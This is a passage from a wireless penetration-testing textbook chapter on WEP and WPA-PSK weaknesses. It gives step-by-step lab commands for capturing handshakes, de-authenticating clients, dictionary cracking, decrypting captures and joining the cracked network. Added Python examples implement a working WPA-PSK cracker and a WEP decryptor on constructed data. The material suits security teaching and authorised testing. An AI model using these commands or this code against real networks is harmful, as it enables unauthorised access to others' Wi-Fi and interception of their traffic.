
You're reading from  BackTrack 5 Wireless Penetration Testing Beginner's Guide

Product typeBook
Published inSep 2011
PublisherPackt
ISBN-139781849515580
Edition1st Edition
Author: Vivek Ramachandran

Vivek Ramachandran has been working on Wi-Fi security since 2003. He discovered the Caffe Latte attack and also broke WEP Cloaking, a WEP protection schema, publicly in 2007 at DEF CON. In 2011, he was the first to demonstrate how malware could use Wi-Fi to create backdoors, worms, and even botnets. Earlier, Vivek was one of the programmers of the 802.1x protocol and Port Security in Cisco's 6500 Catalyst series of switches, and he was also one of the winners of the Microsoft Security Shootout contest held in India among a reported 65,000 participants. He is best known in the hacker community as the founder of SecurityTube.net, where he routinely posts videos on Wi-Fi security, assembly language, exploitation techniques, and so on. SecurityTube.net receives over 100,000 unique visitors a month. Vivek's work on wireless security has been quoted in BBC Online, InfoWorld, MacWorld, The Register, IT World Canada, and so on. This year, he will speak or train at a number of security conferences, including Blackhat, DEF CON, Hacktivity, 44con, HITB-ML, BruCON Derbycon, Hashdays, SecurityZone, and SecurityByte.

Chapter 4. WLAN Encryption Flaws

Note

"640 K is more memory than anyone will ever need."

Bill Gates, Founder, Microsoft

Even with the best of intentions, the future is always unpredictable. The WLAN committee designed WEP and then WPA to be foolproof encryption mechanisms, but over time both turned out to have flaws that have been widely publicized and exploited in the real world.

WLAN encryption mechanisms have a long history of falling to cryptographic attacks. It started with WEP in the early 2000s, which was eventually broken entirely. More recently, attacks have begun to target WPA. Although no public attack currently breaks WPA under general conditions, there are attacks that are feasible under special circumstances, such as a weak pre-shared key.

In this chapter, we shall look at the following:

  • Different encryption schemas in WLANs

  • Cracking WEP encryption

  • Cracking WPA encryption

WLAN encryption


WLANs transmit data over the air, so there is an inherent need to protect the confidentiality of that data, and this is best done using encryption. The IEEE 802.11 WLAN committee formulated the following protocols for data encryption:

  • Wired Equivalent Privacy (WEP)

  • Wi-Fi Protected Access (WPA)

  • Wi-Fi Protected Access v2 (WPA2)

Here, we will look at each of these encryption protocols and demonstrate various attacks against them.

WEP encryption


The WEP protocol was known to be flawed as early as 2000, but surprisingly it is still in use, and access points still ship with WEP available as an option.

There are many cryptographic weaknesses in WEP; they were discovered by Walker, Arbaugh, Fluhrer, Martin, Shamir, KoreK, and many others. Evaluation of WEP from a cryptographic standpoint is beyond the scope of this book, as it involves fairly complex math. Here, we will look at how to break WEP encryption using readily available tools on the BackTrack platform. This includes the entire Aircrack-ng suite of tools: airmon-ng, aireplay-ng, airodump-ng, aircrack-ng, and others.

Let us now first set up WEP in our test lab and see how we can break it.

Time for action – cracking WEP


Follow the given instructions to get started:

  1. Let us first connect to our access point Wireless Lab and go to the settings area that deals with Wireless Encryption mechanisms:

  2. On my access point, this can be done by setting the Security Mode to WEP. We will also need to set the WEP key length. As shown in the following screenshot, I have set WEP to use 128 bit keys. I have set the Default WEP Key to WEP Key 1 and have set the value in hex to abcdefabcdefabcdefabcdef12 as the 128 bit WEP key. Note that this is 26 hex digits, that is, 13 bytes or 104 bits of secret key; the remaining 24 bits of the nominal "128-bit" key are the per-packet IV that is sent in the clear. You can set the key to whatever you choose:

  3. Once the settings are applied, the access point should now be offering WEP as the encryption mechanism of choice. Let us now set up the attacker machine.

  4. Let us bring up wlan0 by issuing the command ifconfig wlan0 up. Then we will run airmon-ng start wlan0 to create mon0, the monitor mode interface, as shown in the following screenshot. Verify that the mon0 interface has been created using the iwconfig command:

  5. Let's run airodump-ng to locate...

WPA/WPA2


WPA (sometimes referred to as WPA v1) primarily uses the TKIP encryption algorithm. TKIP was designed as an improvement over WEP that could run on existing WEP hardware with a firmware or driver update. WPA2, in contrast, mandates support for the AES-CCMP algorithm, which is much stronger and more robust than TKIP.

Both WPA and WPA2 allow either EAP-based authentication using RADIUS servers (Enterprise) or a Pre-Shared Key (PSK) based authentication scheme (Personal).

WPA/WPA2-PSK is vulnerable to a dictionary attack. The inputs required are a capture of the four-way WPA handshake between client and access point, and a wordlist of candidate passphrases. Tools such as Aircrack-ng then derive the key from each candidate and test it against the captured handshake to recover the WPA/WPA2-PSK passphrase.

An illustration of the four-way handshake is shown in the following screenshot:

The way WPA/WPA2-PSK works is that it derives the per-session key, called the Pairwise Transient Key (PTK), from the Pre-Shared Key and five other parameters: the SSID of the network...

Time for action – cracking WPA-PSK weak passphrase


Follow the given instructions to get started:

  1. Let us first connect to our access point Wireless Lab and set the access point to use WPA-PSK. We will set the WPA-PSK passphrase to abcdefgh, so that it is vulnerable to a dictionary attack:

  2. We start airodump-ng with the command airodump-ng --bssid 00:21:91:D2:8E:25 --channel 11 --write WPACrackingDemo mon0, so that it starts capturing and storing all packets for our network:

  3. Now we can wait for a new client to connect to the access point, so that we can capture the four-way WPA handshake or we can send a broadcast de-authentication packet to force clients to reconnect. We do the latter to speed things up:

  4. As soon as we capture a WPA handshake, airodump-ng will indicate it on the top-right corner of the screen with a WPA Handshake: followed by the access point's BSSID:

  5. We can stop airodump-ng now. Let's open up the cap file in Wireshark and view the four-way handshake. Your Wireshark terminal should...

Speeding up WPA/WPA2 PSK cracking


We have already seen in the previous section that if the correct passphrase is in our dictionary, cracking WPA-Personal works every time. So why don't we just build a large dictionary of millions of common passwords and phrases and run that? Most of the time we would end up with the passphrase. It all sounds great, but we are missing one key component: the time taken. The most CPU- and time-consuming part of each attempt is deriving the Pairwise Master Key (PMK, which in PSK mode is the Pre-Shared Key) from the passphrase and the SSID using PBKDF2. This function runs 4,096 iterations of HMAC-SHA1 over the two before outputting the 256-bit key. The next step of cracking uses this key together with the parameters in the four-way handshake to derive the PTK and verify it against the MIC in the handshake. This step is computationally inexpensive, but because the handshake parameters (the nonces) vary every time, it cannot be pre-computed...
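The derivation chain described in the WPA/WPA2 section above and the cost argument in this paragraph, as an added example that is not code from the book or from the Aircrack-ng suite. It runs the slow step (passphrase and SSID into PBKDF2-HMAC-SHA1, 4,096 rounds, 256-bit PMK) and the cheap per-handshake step (PMK plus the two MACs and two nonces into the PTK, then the EAPOL-Key MIC check), once aircrack-ng style with a PBKDF2 per candidate and once with a genpmk-style table of PMKs computed ahead of time for the SSID. The SSID "Wireless Lab", the passphrases abcdefgh and "sky sign" and the BSSID 00:21:91:D2:8E:25 are the chapter's; the client MAC, nonces, wordlist and EAPOL frame are constructed test data.

```python
"""WPA/WPA2-PSK dictionary attack against a constructed four-way handshake.

Added example (not the book's or Aircrack-ng's code). The client MAC, nonces,
wordlist and EAPOL frame below are constructed; SSID, passphrases and BSSID
are the ones used in the chapter.
"""
import hashlib
import hmac

SSID = b"Wireless Lab"
AP_MAC = bytes.fromhex("002191D28E25")       # BSSID from the chapter
CLIENT_MAC = bytes.fromhex("001122334455")   # constructed
ANONCE = bytes(range(32))                    # constructed
SNONCE = bytes(range(32, 64))                # constructed
MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of key descriptor before the MIC
WORDLIST = ["password", "wirelesslab", "sky sign", "abcdefgh", "12345678"]  # constructed


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """The expensive step: PBKDF2-HMAC-SHA1, 4096 iterations, 32-byte PMK.
    In PSK mode this PMK is the Pre-Shared Key; it depends only on passphrase and SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, cut to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    Everything except the PMK is visible in the captured handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed, keyed with the KCK (PTK[0:16]).
    Descriptor version 2 (WPA2/CCMP) uses HMAC-SHA1, version 1 (WPA/TKIP) HMAC-MD5; 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, zeroed, digest).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) carrying the SNonce and the MIC.
    Layout: EAPOL hdr(4) | desc type(1) | key info(2) | key len(2) | replay ctr(8)
    | nonce(32) | IV(16) | RSC(8) | ID(8) | MIC(16) | key data len(2)."""
    body = (b"\x02"                       # descriptor type 2 = RSN (WPA2)
            + b"\x01\x0a"                 # key info: MIC bit, pairwise, descriptor version 2
            + b"\x00\x10"                 # key length
            + b"\x00" * 7 + b"\x01"       # replay counter
            + snonce + b"\x00" * 32       # nonce, then IV(16) + RSC(8) + ID(8)
            + mic + b"\x00\x00")          # MIC, key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def make_handshake(passphrase: str) -> dict:
    """Simulate what airodump-ng captures: the station's message 2 with a valid MIC."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, build_eapol_msg2(SNONCE))
    return {"ap": AP_MAC, "client": CLIENT_MAC, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": build_eapol_msg2(SNONCE, mic), "wpa2": True}


def mic_matches(pmk: bytes, hs: dict) -> bool:
    """The cheap step: PMK -> PTK -> MIC, compared with the MIC in the captured frame.
    It cannot be precomputed because the nonces differ in every handshake."""
    kck = ptk_from_pmk(pmk, hs["ap"], hs["client"], hs["anonce"], hs["snonce"])[:16]
    captured = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["wpa2"]), captured)


def crack(hs: dict, wordlist, ssid: bytes = SSID):
    """aircrack-ng style: one PBKDF2 per candidate. WPA passphrases are 8 to 63
    characters, so anything outside that range is skipped rather than hashed."""
    for word in wordlist:
        if 8 <= len(word) <= 63 and mic_matches(pmk_from_passphrase(word, ssid), hs):
            return word
    return None


def precompute_pmk_table(wordlist, ssid: bytes = SSID) -> dict:
    """genpmk style: built once per SSID, reusable for every handshake from that network."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist if 8 <= len(w) <= 63}


def crack_with_table(hs: dict, table: dict):
    """coWPAtty/airolib-ng style: only the cheap PTK/MIC step runs per candidate."""
    for word, pmk in table.items():
        if mic_matches(pmk, hs):
            return word
    return None


if __name__ == "__main__":
    captured = make_handshake("abcdefgh")
    print("aircrack-ng style :", crack(captured, WORDLIST))
    table = precompute_pmk_table(WORDLIST)
    print("precomputed PMKs  :", crack_with_table(captured, table))
    print("second handshake  :", crack_with_table(make_handshake("sky sign"), table))
```

The second handshake in the usage shows the point of genpmk: the same table cracks a different passphrase on the same SSID without any further PBKDF2 work, whereas a network with a different SSID needs a new table. The MIC is compared with hmac.compare_digest out of habit; on the attacking side timing does not matter, but an AP validating a MIC must not use a plain == comparison.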

Time for action – speeding up the cracking process


  1. We can pre-calculate the PMK for a given SSID and wordlist using the genpmk tool with the command genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d PMK-Wireless-Lab -s "Wireless Lab" as shown in the following screenshot. This creates the file PMK-Wireless-Lab that contains the pre-generated PMKs:

  2. We now create a WPA-PSK network with the passphrase sky sign (present in the dictionary we used) and capture a WPA-handshake for that network. We now use Cowpatty to crack the WPA passphrase as shown in the following screenshot:

  3. It takes approximately 7.18 seconds for Cowpatty to crack the key, using the pre-calculated PMKs as shown in the screenshot:

  4. We now use aircrack-ng with the same dictionary file and the cracking process takes over 22 minutes. This shows how much we are gaining because of the pre-calculation:

  5. In order to use these PMKs with aircrack-ng, we need to use a tool called airolib-ng. We will give it the options airolib-ng PMK-Aircrack...

Decrypting WEP and WPA packets


In all the exercises we have done so far, we have cracked WEP and WPA keys using various techniques. But what do we do with this information? The first step would be to decrypt the data packets we have captured, using these keys.

In the next exercise, we will decrypt the WEP and WPA packets in the same trace file that we captured over the air, using the keys we cracked.

Time for action – decrypting WEP and WPA packets


  1. We will decrypt packets from the same WEP capture file, we created earlier WEPCrackingDemo-01.cap. For this, we will use another tool in the Aircrack-ng suite called Airdecap-ng. We run the following command as shown in the following screenshot: airdecap-ng -w abcdefabcdefabcdefabcdef12 WEPCrackingDemo-01.cap, using the WEP key we cracked previously:

  2. The decrypted packets are stored in a file named WEPCrackingDemo-01-dec.cap. We use the tshark utility to view the first ten packets in the file. Please note that you may see something different based on what you captured:

  3. WPA/WPA2-PSK works in exactly the same way as WEP with the airdecap-ng utility, as shown in the following figure, using the command airdecap-ng -p abcdefgh WPACrackingDemo-01.cap -e "Wireless Lab" (the passphrase and the SSID are both required, because the PMK is derived from the two together):
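What airdecap-ng does to each WEP frame in step 1, as an added example that is not code from the book or from the Aircrack-ng suite: the RC4 keystream is seeded with the 3-byte IV from the frame followed by the secret key, the body is XORed with it, and the trailing CRC-32 ICV is checked. The key is the chapter's abcdefabcdefabcdefabcdef12 (13 bytes, the 104-bit secret half of a "128-bit" WEP key); the IV, the LLC/SNAP header and the payload bytes are constructed. The last function shows why the 24-bit IV is fatal on its own: two frames under the same IV leak the XOR of their plaintexts without the key.

```python
"""Decrypting a WEP frame body with a recovered key, and the IV-reuse leak.

Added example (not the book's or airdecap-ng's code). Only the frame body
(IV | key id | RC4(plaintext || ICV)) is handled; 802.11 headers are left alone.
"""
import struct
import zlib

WEP_KEY = bytes.fromhex("abcdefabcdefabcdefabcdef12")   # key from the chapter
LLC_SNAP_IP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"       # constructed header bytes


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA). WEP feeds it IV || key directly, with
    no per-packet key mixing, which is what the FMS/KoreK attacks exploit."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP's integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Frame body as sent on the air: IV(3) | key id byte | RC4(plaintext || ICV).
    The key index sits in the top two bits of the fourth byte; the access point's
    "WEP Key 1" is index 0 on the wire."""
    return iv + bytes([(key_id & 3) << 6]) + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes):
    """Return the plaintext if the ICV verifies, else None (a wrong key or a
    corrupted frame; airdecap-ng simply does not emit such frames)."""
    if len(body) < 8:
        return None
    iv, ciphertext = body[:3], body[4:]
    decrypted = rc4(iv + key, ciphertext)
    plaintext, tag = decrypted[:-4], decrypted[-4:]
    return plaintext if tag == icv(plaintext) else None


def same_iv_leak(body_a: bytes, body_b: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so the XOR of the two
    ciphertexts equals the XOR of the two plaintexts (and their ICVs), no key
    needed. With 2^24 IVs, reuse is guaranteed on any busy network."""
    if body_a[:3] != body_b[:3]:
        raise ValueError("different IVs: no keystream reuse")
    n = min(len(body_a), len(body_b))
    return bytes(x ^ y for x, y in zip(body_a[4:n], body_b[4:n]))


if __name__ == "__main__":
    frame = wep_encrypt(WEP_KEY, b"\x01\x02\x03", LLC_SNAP_IP + b"hello wireless lab")
    print("captured body :", frame.hex())
    print("decrypted     :", wep_decrypt(WEP_KEY, frame))
    print("wrong key     :", wep_decrypt(bytes(13), frame))
    other = wep_encrypt(WEP_KEY, b"\x01\x02\x03", LLC_SNAP_IP + b"attack at dawn now")
    print("p1 XOR p2     :", same_iv_leak(frame, other)[:-4].hex())
```

Because the first eight bytes of almost every data frame are the same LLC/SNAP header, the leaked XOR immediately gives an attacker eight bytes of keystream for that IV, and with it the first eight bytes of any other frame carrying the same IV. That is the keystream-recovery idea behind the chopchop and fragmentation attacks in aireplay-ng, independent of the statistical key-recovery attacks that aircrack-ng runs on the IVs.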

What just happened?

We just saw how we can decrypt WEP and WPA/WPA2-PSK encrypted packets using Airdecap-ng. It is interesting to note that we can do the same using Wireshark...

Connecting to WEP and WPA networks


We can also connect to the authorized network once we have cracked the network key. This can come in handy during penetration testing: logging onto the authorized network with the cracked key is the ultimate proof you can provide your client that their network is insecure.

Time for action – connecting to a WEP network


  1. Use the iwconfig utility to connect to a WEP network, once you have the key. In a past exercise, we broke the WEP key—abcdefabcdefabcdefabcdef12:

What just happened?

We saw how to connect to a WEP network.

Time for action – connecting to a WPA network


  1. In the case of WPA, the matter is a bit more complicated. The iwconfig utility cannot be used with WPA/WPA2 Personal or Enterprise, as it does not support them. We will use a new tool called wpa_supplicant for this lab. To use wpa_supplicant for a network, we need to create a configuration file as shown in the screenshot. We will name this file wpa-supp.conf:

  2. We then invoke wpa_supplicant with the options -Dwext -iwlan0 -c wpa-supp.conf to connect to the WPA network we just cracked, as shown. Once the connection is successful, wpa_supplicant prints a message of the form Connection to XXXX completed:

  3. For both the WEP and WPA networks, once you are connected you will want to run dhclient3 to obtain a DHCP address from the network, as shown next:

What just happened?

The default Wi-Fi utility iwconfig cannot be used to connect to WPA/WPA2 networks. The de facto tool for this is wpa_supplicant. In this lab, we saw how we can...

Summary


In this chapter, we have learnt the following about WLAN encryption:

  • WEP is flawed: no matter what the WEP key is, with enough captured data packets it is always possible to recover it.

  • WPA/WPA2 has no publicly known practical cryptographic break at present; however, under special circumstances, such as when a weak passphrase is chosen for WPA/WPA2-PSK, the passphrase can be recovered with a dictionary attack.

  • In the next chapter, we will look at different attacks on the WLAN Infrastructure, such as rogue access points, evil twins, bit flipping attacks, and so on.
